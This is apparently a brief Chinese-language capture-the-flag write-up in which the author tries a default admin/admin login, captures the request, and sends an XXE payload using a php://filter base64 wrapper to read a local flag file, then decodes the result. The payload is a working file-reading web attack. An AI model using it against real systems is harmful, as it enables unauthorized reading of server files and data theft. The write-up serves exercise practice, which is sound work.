1.尝试登录

输入账号admin/密码admin进行登录，并未有页面进行跳转

2.尝试抓包分析请求包数据

我们可以发现页面中存在xml请求，我们就可以构造我们的xml请求语句来获取想要的数据

3.构造语句

<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=c:/flag/flag">
]>
&xxe;

这里我们需要将xml语句放入post请求体中并发送

如上图所示便是我们需要获取的数据

4.数据解码

将获取的数据进行解码后我们即可得到我们的flag

flag{dmsioamdoiasdmdmwmdsmd}